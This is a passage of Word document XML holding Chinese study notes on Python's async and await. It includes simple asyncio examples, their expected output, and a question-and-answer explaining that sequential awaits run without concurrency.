      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05F02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>等待一个异步操作完成。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05F02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05F02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字只能在异步函数内部使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05F02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>挂起当前函数的执行，直到等待的异步操作完成并返回结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B25638E" w14:textId="77777777" w:rsidR="008C3F34" w:rsidRDefault="008C3F34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D18886B" w14:textId="746909BC" w:rsidR="001F626E" w:rsidRDefault="008C3F34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213EEB56" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D70EF9" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266619EF" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>async def async_function():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FDB77F" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Async function start")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61755C86" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    await asyncio.sleep(2)  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>模拟一个异步操作，等待</w:t>
      </w:r>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>秒钟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B7544" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Async function end")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EA3D2" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345F7B58" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BA075" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Main function start")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1778E7" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    await async_function()  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>等待异步函数完成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32860BF0" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Main function end")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84BDBE" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E700DC6" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>创建一个事件循环并运行主函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCD200B" w14:textId="77777777" w:rsidR="00853E6F" w:rsidRPr="00853E6F" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEC26A5" w14:textId="07535244" w:rsidR="00D127A1" w:rsidRDefault="00853E6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00853E6F">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>loop.run_until_complete(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45589993" w14:textId="77777777" w:rsidR="00D127A1" w:rsidRDefault="00D127A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A4B9F7D" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个示例中，我们定义了一个异步函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async_function()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它在内部使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await asyncio.sleep(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来模拟一个耗时的异步操作。然后，我们定义了另一个异步函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它在内部调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async_function()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待其完成。最后，我们创建了一个事件循环，并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>run_until_complete()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来运行主函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02325674" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602B6406" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当运行这段代码时，输出将按照以下顺序进行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA929BF" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B386FD" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Main function start"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E6277" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Async function start"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F243ECF" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒钟（异步操作）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A3AED" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Async function end"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E038AFC" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "Main function end"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F7CD2C" w14:textId="77777777" w:rsidR="00A23149" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FCB2109" w14:textId="6586F2D7" w:rsidR="008C3F34" w:rsidRDefault="00A23149" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个示例展示了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的基本用法，它们使得在异步编程中能够更方便地处理并发和异步操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387FEA04" w14:textId="77777777" w:rsidR="008C3F34" w:rsidRDefault="008C3F34" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0528D9CB" w14:textId="04839BE8" w:rsidR="008139AE" w:rsidRDefault="00DB7BED" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="535" w:name="_Toc159779972"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总结后的用法归纳</w:t>
      </w:r>
      <w:bookmarkEnd w:id="535"/>
    </w:p>
    <w:p w14:paraId="7B8D0CCA" w14:textId="71E54B38" w:rsidR="008139AE" w:rsidRPr="007E25E2" w:rsidRDefault="007E25E2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E25E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="008139AE" w:rsidRPr="007E25E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>单纯的</w:t>
      </w:r>
      <w:r w:rsidR="008139AE" w:rsidRPr="007E25E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="008139AE" w:rsidRPr="007E25E2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sync-</w:t>
      </w:r>
      <w:r w:rsidR="008139AE" w:rsidRPr="007E25E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidR="008139AE" w:rsidRPr="007E25E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的顺序结构没有异步意义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C830974" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45499EF7" w14:textId="220FD0EF" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464419F" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>async def say_after(delay, what):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05364D14" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    await asyncio.sleep(delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6482782E" w14:textId="53CF23BC" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(what)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C49574C" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3342BD7D" w14:textId="4C9AC501" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(f"started at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C3662" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    await say_after(1, 'hello')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F1C81" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    #await say_after(1, 'hello')</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>执行完之后，才继续向下执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075F8D90" w14:textId="68848BCE" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    await say_after(2, 'world')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D72515" w14:textId="3FF452E0" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(f"finished at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B64C5A" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9BFB9A" w14:textId="77777777" w:rsidR="008139AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>这种写法的异步是不是没有意义？因为</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>是等待其执行完毕才会执行后面的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A2305" w14:textId="77777777" w:rsidR="001A21AE" w:rsidRDefault="001A21AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B0E8CF" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你的理解是正确的。在你的这个特定例子中，你先后调用了两个异步函数</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> say_after(1, 'hello') </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> say_after(2, 'world')</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且用</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别等待它们完成。因为</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会等待其后的协程执行完毕，所以这两个异步函数实际上是顺序执行的，没有实现并发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E03B32" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304BB984" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但请注意，虽然这个例子中的异步操作没有实现并发，但并不意味着</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> async/await </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身没有意义。这只是因为你的代码选择了按顺序执行两个异步函数。</w:t>
      </w:r>
    </w:p>
